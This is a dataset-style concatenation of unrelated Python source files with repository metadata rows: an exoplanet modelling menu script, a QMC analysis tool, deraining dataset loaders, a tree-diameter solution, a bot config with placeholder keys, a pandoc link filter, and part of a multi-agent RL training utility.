print("\nPlease enter your .csv formatted raw_input file with stellar mole abundances:")
infile = str(raw_input(">>> "))
if "run_alphamelts.command" in os.listdir(os.getcwd()):
if infile in os.listdir(os.getcwd()):
print("\n[~] {} has been found in the working directory!".format(infile))
inputfile_list.append(infile)
# time.sleep(1)
                molepct(infile, infile_type='BSP', consol_file=False, init_path=(os.getcwd()), library=True)
else:
print("\n{} has NOT been found in the working directory!".format(infile))
initialization()
else:
print("\n[X] 'run_alphamelts.command' is not in the working directory!")
time.sleep(2)
initialization()
elif option1 == "3":
print("Please enter the name of the HeFESTo cumulative input file directory")
option3 = str(raw_input(">>> "))
print("What would you like to name this run?")
option4 = str(raw_input(">>> "))
if os.path.exists(home_dir[0] + "/{}".format(option3)):
runhefesto(infiledir=option3, actual_run=True, runname=option4)
else:
print("\n[X] '{}' does not exist in working directory: "
"'{}'!".format((home_dir[0] + "/{}".format(option3)), home_dir[0]))
time.sleep(2)
pass
elif option1 == "4":
print("\nPlease enter the name of your HeFESTo Output File directory...")
option5 = raw_input(">>> ")
if not os.path.exists(option5):
print("That directory does not exist in the working directory!")
time.sleep(2)
initialization()
realform_dir = home_dir[0] + "/" + option5
# if len(os.listdir(realform_dir)) != 2:
# print("\n[X] Warning! The HeFESTo directory '{}' is not properly formatted! (Length != 2, but is length {})".format(realform_dir, len(os.listdir(realform_dir))))
# for i in os.listdir(realform_dir):
# print(i)
# time.sleep(2)
# initialization()
print("What would you like to name this run?")
option6 = raw_input(">>> ")
integrationloop2(hefestodir=option5, runname=option6)
elif option1 == 'o':
print("\nPlease enter the letter of your choice. Would you like to: \n'a' Write a single file with MELTS raw_inputs\n"
"'b' Write a library of MELTS raw_input files\n'c' Write a library of HeFESTo raw input files\n"
"'d' Go back\n")
raw_input_help = raw_input(">>> ")
if raw_input_help == 'a':
print("\nEnter '1' to raw_input [X/H] stellar abundances or '2' to raw_input stellar mole abundances.")
raw_input_help2 = str(raw_input(">>> "))
if raw_input_help2 == "1":
print("\nPlease enter your .csv formatted raw_input file with [X/H] stellar abundances:")
infile = str(raw_input(">>> "))
if infile in os.listdir(os.getcwd()):
print("\n[~] {} has been found in the working directory!".format(infile))
inputfile_list.append(infile)
# time.sleep(1)
logep(infile, infile_type='file', consol_file=True, init_path=(os.getcwd()), library=False)
else:
print("{} has NOT been found in the working directory!\n".format(infile))
time.sleep(1)
initialization()
elif raw_input_help2 == "2":
print("\nPlease enter your .csv formatted raw_input file with stellar mole abundances:")
infile = str(raw_input(">>> "))
if infile in os.listdir(os.getcwd()):
print("\n[~] {} has been found in the working directory!".format(infile))
inputfile_list.append(infile)
# time.sleep(1)
molepct(infile, infile_type='file', consol_file=True, init_path=(os.getcwd()), library=False)
else:
print("\n{} has NOT been found in the working directory!".format(infile))
initialization()
else:
print("\n[X] Oops! That's not a valid command!\n")
time.sleep(1)
initialization()
elif raw_input_help == 'b':
print("\nEnter '1' to raw_input [X/H] stellar abundances or '2' to raw_input stellar mole abundances.")
raw_input_help2 = str(raw_input(">>> "))
if raw_input_help2 == "1":
print("\nPlease enter your .csv formatted raw_input file with [X/H] stellar abundances:")
infile = raw_input(">>> ")
if infile in os.listdir(os.getcwd()):
print("\n[~] {} has been found in the working directory!".format(infile))
inputfile_list.append(infile)
# time.sleep(1)
logep(infile, infile_type='file', consol_file=False, init_path=(os.getcwd()), library=True)
else:
print("{} has NOT been found in the working directory!\n".format(infile))
time.sleep(1)
initialization()
elif raw_input_help2 == "2":
print("\nPlease enter your .csv formatted raw_input file with stellar mole abundances:")
infile = str(raw_input(">>> "))
if infile in os.listdir(os.getcwd()):
print("\n[~] {} has been found in the working directory!".format(infile))
inputfile_list.append(infile)
# time.sleep(1)
molepct(infile, infile_type='file', consol_file=False, init_path=(os.getcwd()), library=True)
else:
print("\n{} has NOT been found in the working directory!".format(infile))
initialization()
else:
print("\n[X] Oops! That's not a valid command!\n")
time.sleep(1)
initialization()
elif raw_input_help == 'c':
runhefesto(actual_run=False)
elif raw_input_help == 'd':
initialization()
else:
print("\n[X] Oops! That's not a valid command!\n")
time.sleep(1)
initialization()
elif option1 == 'e':
print("\nThank you for using the Exoplanet Pocketknife!\n")
print("\n___________________________________________\n")
sys.exit()
else:
print("\n[X] Oops! {} is not a valid command!\n".format(option1))
time.sleep(1)
initialization()
initialization()
| 46.7689 | 207 | 0.541234 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 30,456 | 0.31158 |
9500f8ddc8a192d5b326bf23ad973aa2e9a8109b
| 4,074 |
py
|
Python
|
tools/extract_observable.py
|
pauxy-qmc/pauxy
|
1da80284284769b59361c73cfa3c2d914c74a73f
|
[
"Apache-2.0"
] | 16 |
2020-08-05T17:17:17.000Z
|
2022-03-18T04:06:18.000Z
|
tools/extract_observable.py
|
pauxy-qmc/pauxy
|
1da80284284769b59361c73cfa3c2d914c74a73f
|
[
"Apache-2.0"
] | 4 |
2020-05-17T21:28:20.000Z
|
2021-04-22T18:05:50.000Z
|
tools/extract_observable.py
|
pauxy-qmc/pauxy
|
1da80284284769b59361c73cfa3c2d914c74a73f
|
[
"Apache-2.0"
] | 5 |
2020-05-18T01:03:18.000Z
|
2021-04-13T15:36:29.000Z
|
#!/usr/bin/env python
'''Extract element of Green's function'''
import argparse
import sys
import numpy
import os
import pandas as pd
import json
_script_dir = os.path.abspath(os.path.dirname(__file__))
sys.path.append(os.path.join(_script_dir, 'analysis'))
import matplotlib.pyplot as plt
# from pauxy.analysis.extraction import analysed_itcf
# from pauxy.analysis.extraction import analysed_energies, extract_hdf5_simple
from pauxy.analysis.extraction import (
extract_mixed_estimates,
get_metadata
)
import matplotlib.pyplot as pl
def parse_args(args):
"""Parse command-line arguments.
Parameters
----------
args : list of strings
command-line arguments.
Returns
-------
options : :class:`argparse.ArgumentParser`
Command line arguments.
"""
parser = argparse.ArgumentParser(description = __doc__)
parser.add_argument('-s', '--spin', type=str, dest='spin',
default=None, help='Spin component to extract.'
'Options: up/down')
parser.add_argument('-t', '--type', type=str, dest='type',
default=None, help='Type of green\'s function to extract.'
'Options: lesser/greater')
parser.add_argument('-k', '--kspace', dest='kspace', action='store_true',
default=False, help='Extract kspace green\'s function.')
parser.add_argument('-e', '--elements',
type=lambda s: [int(item) for item in s.split(',')],
dest='elements', default=None,
help='Element to extract.')
parser.add_argument('-o', '--observable', type=str, dest='obs',
default='None', help='Data to extract')
parser.add_argument('-p', '--plot-energy', action='store_true', dest='plot',
default=False, help='Plot energy trace.')
parser.add_argument('-f', nargs='+', dest='filename',
help='Space-separated list of files to analyse.')
options = parser.parse_args(args)
if not options.filename:
parser.print_help()
sys.exit(1)
return options
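# Example invocations (file and column names below are hypothetical):
#   python extract_observable.py -o energy -f estimates.0.h5
#   python extract_observable.py -p -o ETotal -f estimates.0.h5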
def main(args):
"""Extract observable from analysed output.
Parameters
----------
args : list of strings
command-line arguments.
Returns
-------
results : :class:`pandas.DataFrame`
        Analysed results.
"""
options = parse_args(args)
print_index = False
if options.obs == 'itcf':
results = analysed_itcf(options.filename[0], options.elements,
options.spin, options.type, options.kspace)
elif options.obs == 'energy':
results = analysed_energies(options.filename[0], 'mixed')
elif options.obs == 'back_propagated':
results = analysed_energies(options.filename[0], 'back_propagated')
elif 'correlation' in options.obs:
ctype = options.obs.replace('_correlation', '')
results = correlation_function(options.filename[0],
ctype,
options.elements)
print_index = True
elif options.plot:
data = extract_mixed_estimates(options.filename[0])
md = get_metadata(options.filename[0])
fp = md['propagators']['free_projection']
dt = md['qmc']['dt']
mc = md['qmc']['nsteps']
data = data[abs(data.Weight) > 0.0]
tau = numpy.arange(0,len(data)) * mc * dt
if fp:
pl.plot(tau, numpy.real(data.ENumer/data.EDenom))
pl.xlabel(r"$\tau$ (au)")
pl.ylabel(r"Energy (au)")
pl.show()
else:
pl.plot(tau, data[options.obs].real)
pl.xlabel(r"$\tau$ (au)")
pl.ylabel(r"{} (au)".format(options.obs))
pl.show()
else:
print ('Unknown observable')
if not options.plot:
print (results.to_string())
results.to_csv("%s"%options.obs)
if __name__ == '__main__':
main(sys.argv[1:])
| 33.393443 | 82 | 0.579774 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,317 | 0.32327 |
950130b7d174e4ab134e14783a96e2c70ef6e914
| 12,854 |
py
|
Python
|
datasets.py
|
shivakanthsujit/FMMRNet
|
12742398e3b981938a69e44b3f37d285904929b4
|
[
"MIT"
] | null | null | null |
datasets.py
|
shivakanthsujit/FMMRNet
|
12742398e3b981938a69e44b3f37d285904929b4
|
[
"MIT"
] | null | null | null |
datasets.py
|
shivakanthsujit/FMMRNet
|
12742398e3b981938a69e44b3f37d285904929b4
|
[
"MIT"
] | null | null | null |
import glob
import os
import albumentations as A
import kaggle
import numpy as np
import PIL
import pytorch_lightning as pl
import torch
from albumentations.pytorch import ToTensorV2
from torch.utils.data import random_split
from torch.utils.data.dataloader import DataLoader
from utils import show_images
def get_train_transforms(input_size=256):
return A.Compose(
[
A.RandomCrop(input_size, input_size),
A.HorizontalFlip(),
A.VerticalFlip(),
A.OneOf(
[
A.HueSaturationValue(
hue_shift_limit=0.2,
sat_shift_limit=0.2,
val_shift_limit=0.2,
p=0.9,
),
A.RandomBrightnessContrast(brightness_limit=0.2, contrast_limit=0.15, p=0.9),
],
p=0.9,
),
A.ToFloat(255),
ToTensorV2(),
],
additional_targets={"image1": "image"},
)
def get_valid_transforms(input_size=256):
return A.Compose(
[A.CenterCrop(input_size, input_size), A.ToFloat(255), ToTensorV2()],
additional_targets={"image1": "image"},
)
train_transform = get_train_transforms()
valid_transform = get_valid_transforms()
BATCH_SIZE = 4
SEED = 42
NUM_WORKERS = 4
kaggle.api.authenticate()
class BaseDataModule(pl.LightningDataModule):
def __init__(self, batch_size=BATCH_SIZE, seed=SEED, num_workers=NUM_WORKERS, on_gpu=True):
super().__init__()
self.batch_size = batch_size
self.seed = seed
self.num_workers = num_workers
self.on_gpu = on_gpu
def show_sample(self, split="train"):
assert split in ["train", "val", "test"], f"Invalid {split}"
if hasattr(self, f"{split}_data"):
            loader = getattr(self, f"{split}_dataloader")()
print(f"No. of batches in {split}: ", len(loader))
x, y, z = next(iter(loader))
show_images(torch.cat((x, y, z)))
else:
print(f"Split {split} not found")
def train_dataloader(self):
return DataLoader(
self.train_data,
shuffle=True,
batch_size=self.batch_size,
num_workers=self.num_workers,
pin_memory=self.on_gpu,
)
def val_dataloader(self):
return DataLoader(
self.val_data,
shuffle=False,
batch_size=self.batch_size,
num_workers=self.num_workers,
pin_memory=self.on_gpu,
)
def test_dataloader(self):
return DataLoader(
self.test_data,
shuffle=False,
batch_size=self.batch_size,
num_workers=self.num_workers,
pin_memory=self.on_gpu,
)
def split_dataset(data, frac, seed):
assert isinstance(frac, float) and frac <= 1.0 and frac >= 0.0, f"Invalid fraction {frac}"
train_split = int(len(data) * frac)
val_split = len(data) - train_split
return random_split(data, [train_split, val_split], generator=torch.Generator().manual_seed(seed))
class JRDR(torch.utils.data.Dataset):
def __init__(self, root, type="Light", split="train", transform=train_transform):
self.root = root
self.data_dir = os.path.join(self.root, "rain_data_" + split + "_" + type)
if type == "Heavy" or split == "test":
self.rain_dir = os.path.join(self.data_dir, "rain/X2")
else:
self.rain_dir = os.path.join(self.data_dir, "rain")
self.norain_dir = os.path.join(self.data_dir, "norain")
self.files = glob.glob(self.rain_dir + "/*.*")
if len(self.files) == 0:
raise RuntimeError("Dataset not found.")
self.transform = transform
def get_file_name(self, idx):
img1 = self.files[idx]
_, img2 = os.path.split(img1)
img2 = img2.split("x2")[0] + ".png"
img2 = os.path.join(self.norain_dir, img2)
return img1, img2
def __getitem__(self, idx):
img1, img2 = self.get_file_name(idx)
rain_img = PIL.Image.open(img1)
norain_img = PIL.Image.open(img2)
if self.transform is not None:
rain_img, norain_img = np.array(rain_img), np.array(norain_img)
aug = self.transform(image=rain_img, image1=norain_img)
rain_img, norain_img = aug["image"], aug["image1"]
return rain_img, norain_img, rain_img - norain_img
def __len__(self):
return len(glob.glob(self.norain_dir + "/*.*"))
class JRDRDataModule(BaseDataModule):
"""
JRDR DataModule for PyTorch-Lightning
Learn more at https://pytorch-lightning.readthedocs.io/en/stable/extensions/datamodules.html
"""
def __init__(
self,
data_dir="data/",
dataset_type="Light",
train_transform=train_transform,
valid_transform=valid_transform,
batch_size=BATCH_SIZE,
seed=SEED,
num_workers=NUM_WORKERS,
on_gpu=True,
):
super().__init__(batch_size=batch_size, seed=seed, num_workers=num_workers, on_gpu=on_gpu)
self.data_dir = data_dir
self.train_transform = train_transform
self.valid_transform = valid_transform
self.type = dataset_type
def prepare_data(self):
dataset_dir = os.path.join(self.data_dir, "JRDR")
if not os.path.exists(dataset_dir):
kaggle.api.dataset_download_files("shivakanthsujit/jrdr-deraining-dataset", path=self.data_dir, unzip=True)
def setup(self, stage):
dataset_dir = os.path.join(self.data_dir, "JRDR")
data = JRDR(root=dataset_dir, type=self.type, split="train", transform=self.train_transform)
self.train_data, self.val_data = split_dataset(data, 0.8, self.seed)
self.test_data = JRDR(root=dataset_dir, type=self.type, split="test", transform=self.valid_transform)
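# Minimal usage sketch for the data module above (hypothetical: `DerainModel` stands
# in for whatever pl.LightningModule this repo trains and is not defined in this file):
#
#   dm = JRDRDataModule(data_dir="data/", dataset_type="Light", batch_size=BATCH_SIZE)
#   trainer = pl.Trainer(max_epochs=100, gpus=1)
#   trainer.fit(DerainModel(), datamodule=dm)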
class li_cvpr(torch.utils.data.Dataset):
def __init__(self, root, transform=valid_transform):
self.root = root
self.rain_files = sorted(glob.glob(self.root + "/*in.png"))
self.norain_files = sorted(glob.glob(self.root + "/*GT.png"))
if len(self.rain_files) == 0 or len(self.norain_files) == 0:
raise RuntimeError("Dataset not found.")
self.transform = transform
def get_file_name(self, idx):
img1 = self.rain_files[idx]
img2 = self.norain_files[idx]
return img1, img2
def __getitem__(self, idx):
img1, img2 = self.get_file_name(idx)
rain_img = PIL.Image.open(img1)
norain_img = PIL.Image.open(img2)
if self.transform is not None:
rain_img, norain_img = np.array(rain_img), np.array(norain_img)
aug = self.transform(image=rain_img, image1=norain_img)
rain_img, norain_img = aug["image"], aug["image1"]
return rain_img, norain_img, rain_img - norain_img
def __len__(self):
return len(self.rain_files)
class Rain12DataModule(BaseDataModule):
"""
Rain12 DataModule for PyTorch-Lightning
Learn more at https://pytorch-lightning.readthedocs.io/en/stable/extensions/datamodules.html
"""
def __init__(
self,
data_dir="data/",
train_transform=train_transform,
valid_transform=valid_transform,
batch_size=BATCH_SIZE,
seed=SEED,
num_workers=NUM_WORKERS,
on_gpu=True,
):
super().__init__(batch_size=batch_size, seed=seed, num_workers=num_workers, on_gpu=on_gpu)
self.data_dir = data_dir
self.train_transform = train_transform
self.valid_transform = valid_transform
def prepare_data(self):
kaggle.api.dataset_download_files("shivakanthsujit/li-cvpr-dataset", path=self.data_dir, unzip=True)
def setup(self, stage):
dataset_dir = os.path.join(self.data_dir, "Rain12")
if stage == "fit" or stage is None:
data = li_cvpr(root=dataset_dir, transform=self.train_transform)
self.train_data, self.val_data = split_dataset(data, 0.8, self.seed)
if stage == "test" or stage is None:
self.test_data = li_cvpr(root=dataset_dir, transform=self.valid_transform)
class IDGAN(torch.utils.data.Dataset):
def __init__(self, root, split="train", syn=True, transform=train_transform):
self.root = root
self.data_dir = os.path.join(self.root, "rain")
if split == "test":
self.rain_dir = os.path.join(self.data_dir, "test_syn")
else:
self.rain_dir = os.path.join(self.data_dir, "training")
self.norain_dir = self.rain_dir
self.files = glob.glob(self.rain_dir + "/*.*")
if len(self.files) == 0:
raise RuntimeError("Dataset not found.")
self.transform = transform
def get_file_name(self, idx):
img1 = self.files[idx]
_, img2 = os.path.split(img1)
img2 = img2.split("x2")[0] + ".png"
img2 = os.path.join(self.norain_dir, img2)
return img1, img2
def __getitem__(self, idx):
img1 = self.files[idx]
im = PIL.Image.open(img1)
w, h = im.size
norain_img = im.crop((0, 0, w // 2, h))
norain_img = np.array(norain_img)
rain_img = im.crop((w // 2, 0, w, h))
rain_img = np.array(rain_img)
if self.transform is not None:
rain_img, norain_img = np.array(rain_img), np.array(norain_img)
aug = self.transform(image=rain_img, image1=norain_img)
rain_img, norain_img = aug["image"], aug["image1"]
return rain_img, norain_img, rain_img - norain_img
def __len__(self):
return len(glob.glob(self.norain_dir + "/*.*"))
class IDCGANDataModule(BaseDataModule):
"""
IDCGAN DataModule for PyTorch-Lightning
Learn more at https://pytorch-lightning.readthedocs.io/en/stable/extensions/datamodules.html
"""
def __init__(
self,
data_dir="data/",
syn=True,
train_transform=train_transform,
valid_transform=valid_transform,
batch_size=BATCH_SIZE,
seed=SEED,
num_workers=NUM_WORKERS,
on_gpu=True,
):
super().__init__(batch_size=batch_size, seed=seed, num_workers=num_workers, on_gpu=on_gpu)
self.data_dir = data_dir
self.train_transform = train_transform
self.valid_transform = valid_transform
self.syn = syn
def prepare_data(self):
kaggle.api.dataset_download_files("shivakanthsujit/idgan-dataset", path=self.data_dir, unzip=True)
def setup(self, stage):
dataset_dir = os.path.join(self.data_dir, "IDGAN")
if stage == "fit" or stage is None:
data = IDGAN(root=dataset_dir, syn=self.syn, transform=self.train_transform)
self.train_data, self.val_data = split_dataset(data, 0.8, self.seed)
if stage == "test" or stage is None:
self.test_data = IDGAN(root=dataset_dir, syn=self.syn, split="test", transform=self.valid_transform)
def get_train_valid_loader(
train_data,
valid_data,
batch_size=4,
valid_size=0.1,
show_sample=False,
num_workers=NUM_WORKERS,
pin_memory=False,
shuffle=True,
seed=SEED,
):
error_msg = "[!] valid_size should be in the range [0, 1]."
assert (valid_size >= 0) and (valid_size <= 1), error_msg
num_train = len(train_data)
indices = list(range(num_train))
split = int(np.floor(valid_size * num_train))
if shuffle:
np.random.seed(seed)
np.random.shuffle(indices)
train_idx, valid_idx = indices[split:], indices[:split]
train_dataset = torch.utils.data.Subset(train_data, train_idx)
valid_dataset = torch.utils.data.Subset(valid_data, valid_idx)
train_loader = DataLoader(
train_dataset,
batch_size=batch_size,
num_workers=num_workers,
pin_memory=pin_memory,
)
valid_loader = DataLoader(
valid_dataset,
batch_size=batch_size,
num_workers=num_workers,
pin_memory=pin_memory,
)
print("Training Batches: ", len(train_loader))
print("Validation Batches: ", len(valid_loader))
# visualize some images
if show_sample:
x, y, z = next(iter(train_loader))
show_images(torch.cat((x, y, z)))
x, y, z = next(iter(valid_loader))
show_images(torch.cat((x, y, z)))
return train_loader, valid_loader
def get_test_loader(test_data, batch_size=1, shuffle=False, num_workers=NUM_WORKERS, pin_memory=False):
test_loader = DataLoader(
test_data,
batch_size=batch_size,
num_workers=num_workers,
shuffle=shuffle,
pin_memory=pin_memory,
)
print("Testing Batches: ", len(test_loader))
return test_loader
| 33.300518 | 119 | 0.628131 | 9,365 | 0.728567 | 0 | 0 | 0 | 0 | 0 | 0 | 1,245 | 0.096857 |
9505115c9cbc7843483152234defea7c4da55e5d
| 663 |
py
|
Python
|
29_Tree/Step03/wowo0709.py
|
StudyForCoding/BEAKJOON
|
84e1c5e463255e919ccf6b6a782978c205420dbf
|
[
"MIT"
] | null | null | null |
29_Tree/Step03/wowo0709.py
|
StudyForCoding/BEAKJOON
|
84e1c5e463255e919ccf6b6a782978c205420dbf
|
[
"MIT"
] | 3 |
2020-11-04T05:38:53.000Z
|
2021-03-02T02:15:19.000Z
|
29_Tree/Step03/wowo0709.py
|
StudyForCoding/BEAKJOON
|
84e1c5e463255e919ccf6b6a782978c205420dbf
|
[
"MIT"
] | null | null | null |
import sys
input = sys.stdin.readline
from collections import deque
def bfs(v):
dp = [-1 for _ in range(V+1)]
dp[v] = 0
q = deque()
q.append(v)
while q:
cv = q.popleft()
for nc,nv in tree[cv]:
            if dp[nv] == -1: # if not visited yet,
dp[nv] = dp[cv] + nc
q.append(nv)
return dp
# main
V = int(input())
tree = [[] for _ in range(V+1)]
# Same as BOJ 1167; only the input format differs
for _ in range(V-1):
a,b,c = map(int,input().split())
tree[a].append((c,b))
tree[b].append((c,a))
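# Tree diameter via double BFS: the vertex farthest from any start vertex is an
# endpoint of the diameter, so a second BFS from that vertex yields the diameter.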
ds = bfs(1) # distances from an arbitrary vertex
v = ds.index(max(ds)) # find the vertex farthest from it
print(max(bfs(v))) # the maximum distance from that vertex
| 24.555556 | 43 | 0.517345 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 210 | 0.269576 |
9506269afc0618a55f2884b0a52f8b3902a5b1f4
| 997 |
py
|
Python
|
config.py
|
anvme/TONTgContractBot
|
e5fa48d262faec26e2835daa6db764867a369672
|
[
"Apache-2.0"
] | null | null | null |
config.py
|
anvme/TONTgContractBot
|
e5fa48d262faec26e2835daa6db764867a369672
|
[
"Apache-2.0"
] | null | null | null |
config.py
|
anvme/TONTgContractBot
|
e5fa48d262faec26e2835daa6db764867a369672
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ##### TONTgBotContract Config
# Edit starts here
TgBotAPIKey = 'xxxx:yyyy' # API Key that you get from @BotFather
tg = 11111 # Your id, you can get it by sending command /id to bot @TONTgIDBot
# Edit ends here
tonoscli = '/opt/tonos-cli/target/release/tonos-cli' # Path to tonos-cli
solccompiler = '/opt/ton-solidity-compiler/compiler/build/solc/solc'
tvmlinker = '/opt/ton-tvm-linker/tvm_linker/target/debug/tvm_linker'
compiler = '/opt/tontgbotcontract/data/compiler/' # Path to compiler
tvc = '/opt/tontgbotcontract/data/tvc/' # Path to tvc
sol = '/opt/tontgbotcontract/data/sol/' # Path to sol
keys = '/opt/tontgbotcontract/data/keys/' # Path to keys
tcurl = 'https://net.ton.dev' # tonos-cli net network
gruntabi = "/opt/tontgbotcontract/data/Grunt.abi"
##########
tontgcpath = '/opt/tontgbotcontract' # Folder with this bot.
tontgcpathdb = '/opt/tontgbotcontract/db' # Folder with bot database.
# ##### /TONTgBotContract Config
| 32.16129 | 78 | 0.713139 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 814 | 0.816449 |
95086bdd5bed5808e0d9ba240d94e656c6d84fab
| 1,624 |
py
|
Python
|
_scripts/pandoc_wiki_filter.py
|
BenjaminPollak/coursebook
|
4646102b5f4c3d283885ba1b221da71a5e509eeb
|
[
"CC-BY-3.0",
"CC-BY-4.0"
] | null | null | null |
_scripts/pandoc_wiki_filter.py
|
BenjaminPollak/coursebook
|
4646102b5f4c3d283885ba1b221da71a5e509eeb
|
[
"CC-BY-3.0",
"CC-BY-4.0"
] | null | null | null |
_scripts/pandoc_wiki_filter.py
|
BenjaminPollak/coursebook
|
4646102b5f4c3d283885ba1b221da71a5e509eeb
|
[
"CC-BY-3.0",
"CC-BY-4.0"
] | null | null | null |
#!/usr/bin/env python3
"""
Pandoc filter to change each relative URL to absolute
"""
from panflute import run_filter, Str, Header, Image, Math, Link, RawInline
import sys
import re
base_raw_url = 'https://raw.githubusercontent.com/illinois-cs241/coursebook/master/'
class NoAltTagException(Exception):
pass
def change_base_url(elem, doc):
if type(elem) == Image:
# Get the number of chars for the alt tag
alt_length = len(elem._content)
# No alt means no compile
# Accessibility by default
if alt_length == 0:
raise NoAltTagException(elem.url)
# Otherwise link to the raw user link instead of relative
# That way the wiki and the site will have valid links automagically
elem.url = base_raw_url + elem.url
return elem
if isinstance(elem, Math):
# Raw inline mathlinks so jekyll renders them
content = elem.text
escaped = "$$ {} $$".format(content)
return RawInline(escaped)
if isinstance(elem, Link):
# Transform all Links into a tags
# Reason being is github and jekyll are weird
# About leaving html as is and markdown as parsing
# So we change everything to avoid ambiguity
# There is a script injection possibility here so be careful
url = elem.url
title = str(elem.title)
if title == "":
title = elem.url
link = '<a href="{}">{}</a>'.format(url, title)
return RawInline(link)
def main(doc=None):
return run_filter(change_base_url, doc=doc)
if __name__ == "__main__":
main()
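# Example invocation (input/output file names are hypothetical):
#   pandoc some_chapter.md --filter _scripts/pandoc_wiki_filter.py -o some_chapter.html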
| 28.491228 | 84 | 0.640394 | 44 | 0.027094 | 0 | 0 | 0 | 0 | 0 | 0 | 689 | 0.424261 |
9508ac69c9c25e71d33441ccd8a681ec504ce33e
| 8,793 |
py
|
Python
|
PA_multiagent_game/multiagent_utils.py
|
salesforce/RIRL
|
6f137955bfbe2054be18bb2b15d0e6aedb972b06
|
[
"BSD-3-Clause"
] | null | null | null |
PA_multiagent_game/multiagent_utils.py
|
salesforce/RIRL
|
6f137955bfbe2054be18bb2b15d0e6aedb972b06
|
[
"BSD-3-Clause"
] | null | null | null |
PA_multiagent_game/multiagent_utils.py
|
salesforce/RIRL
|
6f137955bfbe2054be18bb2b15d0e6aedb972b06
|
[
"BSD-3-Clause"
] | null | null | null |
#
# Copyright (c) 2022, salesforce.com, inc.
# All rights reserved.
# SPDX-License-Identifier: BSD-3-Clause
# For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause
#
import sys
import glob
sys.path.insert(0, '..')
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import tqdm
import torch
from torch.distributions import Categorical
from IPython import display
from agents.soft_q import SoftQAgent
from multi_channel_RI import MCCPERDPAgent
######### General #######################################################
def smooth_plot(values, window = 100):
assert window >= 1
n = len(values)
if n < 2:
return values
elif n < window:
window = int(np.floor(n/2))
else:
window = int(window)
cs_values = np.cumsum(values)
smooth_values = (cs_values[window:] - cs_values[:-window]) / window
smooth_xs = np.arange(len(smooth_values)) + (window/2)
return smooth_xs, smooth_values
##### Training Function ##########################################################
def train(principal_pol, agent_pol, env, n_iters=500, hist=None, train_principal=True, train_agent=True,
normalize_t=False, normalize_n_a=False, plot = True, **kwargs):
#train_principal and train_agent arguments used if want to stagger training
assert isinstance(principal_pol, MCCPERDPAgent)
if isinstance(agent_pol, SoftQAgent):
agent_arch_type = 'SQA'
elif isinstance(agent_pol, MCCPERDPAgent):
agent_arch_type = 'RIA'
else:
raise NotImplementedError("Agent type not implemented")
n_agents = env.n_agents
# horizon = env.horizon
# only add things to history if we are training both the principal and agent
if train_principal and train_agent:
if hist is None:
hist = {'r_a': [], 'r_p': [], 'ext_r_a': [], 'ext_r_p': [], 'mi': [], 'ep_r_a': [], 'ep_r_p':[], 'ext_ep_r_a':[], 'ext_ep_r_p':[]}
iter_vals = range(n_iters)
if not plot:
iter_vals = tqdm.tqdm(iter_vals)
for _ in iter_vals:
p_state = env.reset()
horizon = env.horizon
a_states = None
r_a = None
a_actions = None
done = False
# Principal and Agent Rewards
rs_seq_a = []
rs_seq_p = []
# Principal and Agent EXTRINSIC Rewards
ext_rs_seq_a = []
ext_rs_seq_p = []
principal_pol.new_episode()
agent_pol.new_episode()
while not done:
# Step the principal policy
p_actions, total_p_mi_costs = principal_pol.act(p_state)
next_a_states = env.principal_step(p_actions)
# Store stuff in the agent buffer, if appropriate
if train_agent:
if (a_states is not None) and (agent_arch_type == 'SQA'):
agent_pol.batch_add_experience(a_states, a_actions, r_a,
next_a_state=next_a_states, done=False)
a_states = next_a_states
# Step the agent policy
if (agent_arch_type == 'SQA'):
_, a_actions = agent_pol.act(a_states)
a_actions = a_actions.detach().numpy()
total_a_mi_costs = 0
else:
a_actions, total_a_mi_costs = agent_pol.act(a_states)
(r_as, r_p, r_a), p_state, done = env.agent_step(a_actions)
            # r_as is a 2D array of rewards [agent1 rewards, agent2 rewards, ..., agentn rewards],
            # while r_a is one flat array of length batch_size * n_agents:
            # r_a = np.concatenate(r_as) and r_as = r_a.reshape(n_agents, batch_size).T
ext_r_a = np.array(r_a)
ext_r_p = np.array(r_p)
# Add mi costs
r_a -= total_a_mi_costs
r_p -= total_p_mi_costs
#Normalize if applicable
if normalize_t:
r_a = r_a / env.horizon
r_p = r_p / env.horizon
ext_r_a = ext_r_a / env.horizon
ext_r_p = ext_r_p / env.horizon
if normalize_n_a:
r_p = r_p / float(n_agents)
ext_r_p = ext_r_p / float(n_agents)
# Accumulate rewards
rs_seq_a.append(r_a)
rs_seq_p.append(r_p)
ext_rs_seq_a.append(ext_r_a)
ext_rs_seq_p.append(ext_r_p)
# The game just ended, so we need to...
#### TRAIN AGENT ####
if train_agent:
if agent_arch_type == 'SQA':
agent_pol.batch_add_experience(a_states, a_actions, r_a,
next_a_state=None,
done=True)
_ = agent_pol.train()
else:
_ = agent_pol.end_episode(rs_seq_a)
#### TRAIN PRINCIPAL ####
if train_principal:
_ = principal_pol.end_episode(rs_seq_p)
# Log things for visualization
if train_principal and train_agent:
avg_rs_a = np.stack(rs_seq_a).mean(1)
hist['r_a'].append(avg_rs_a)
avg_rs_p = np.stack(rs_seq_p).mean(1)
hist['r_p'].append(avg_rs_p)
avg_ext_rs_a = np.stack(ext_rs_seq_a).mean(1)
hist['ext_r_a'].append(avg_ext_rs_a)
avg_ext_rs_p = np.stack(ext_rs_seq_p).mean(1)
hist['ext_r_p'].append(avg_ext_rs_p)
hist['ep_r_a'].append(np.sum(avg_rs_a ))
hist['ep_r_p'].append(np.sum(avg_rs_p))
hist['ext_ep_r_a'].append(np.sum(avg_ext_rs_a))
hist['ext_ep_r_p'].append(np.sum(avg_ext_rs_p))
channel_mis = principal_pol.get_mis_channels()
for channel_name, mi_val in channel_mis:
if channel_name not in hist:
hist[channel_name] = {}
if env.horizon not in hist[channel_name]:
hist[channel_name][env.horizon] = []
hist[channel_name][env.horizon].append(mi_val)
return hist
##### Plotting the History ##########################################################
def plot_hist_signaling_vary_h(hist, axes=None, plot_smoothed_only = False):
matplotlib.rcParams['image.aspect'] = 'auto'
matplotlib.rcParams['image.interpolation'] = 'none'
if axes is None:
_, axes = plt.subplots(2, 4, figsize=(16, 8))
(ax0, ax1, ax2, ax3) = axes[0]
(ax4, ax5, ax6, ax7) = axes[1]
for subax in axes:
for ax in subax:
ax.cla()
